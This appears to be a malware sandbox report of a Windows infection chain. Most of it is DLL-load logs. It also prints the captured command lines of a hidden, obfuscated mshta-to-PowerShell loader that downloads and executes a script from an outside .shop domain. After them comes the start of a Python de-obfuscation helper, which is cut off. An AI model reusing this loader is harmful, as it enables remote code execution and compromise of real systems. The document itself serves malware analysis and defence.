Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
(This sequence of six loads is recorded 15 consecutive times; they are the Winsock name-resolution provider DLLs pulled in each time a name lookup runs.)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2214673362.0000000006CC0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000006.00000002.2182040392.0000000000821000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb+ source: powershell.exe, 00000006.00000002.2214556917.0000000006C9B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.2214673362.0000000006CC0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.pdb7 source: powershell.exe, 00000006.00000002.2214673362.0000000006CD3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbpV source: powershell.exe, 00000006.00000002.2182040392.00000000007B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb) source: powershell.exe, 00000006.00000002.2182040392.0000000000821000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000006.00000002.2214673362.0000000006CC0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb. source: powershell.exe, 00000006.00000002.2213256401.0000000006C10000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()
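The two command lines above carry no literal `New-Object`, `DownloadString` or `IEX`: the first stage rebuilds its payload from hex pairs, and the second stage never names a method, it picks members by `-like` wildcard and a fixed Get-Member index. The helper below is an added example written for this report, not code from the sample or from Joe Sandbox, that replays those lookups statically in Python so nothing is executed and no network request is made. The member tables are an assumption, reproduced from a Windows PowerShell 5.1 session rather than from the report; the list of visible commands is constructed, since on the victim `GetCommandName('N*-O*', $TRUE, $TRUE)` sees every command the host exposes and could in principle match more than `New-Object`.

```python
"""Static de-obfuscation of the two PowerShell stages recorded above.
Nothing here runs PowerShell or touches the network; every lookup the loader
performs at run time is replayed against fixed member tables."""
import fnmatch
import re

# Second-stage command line as recorded for the SysWOW64 powershell.exe.
STAGE2_CMDLINE = (
    "gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name)"
    ".(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object"
    "{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name)"
    ".(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object"
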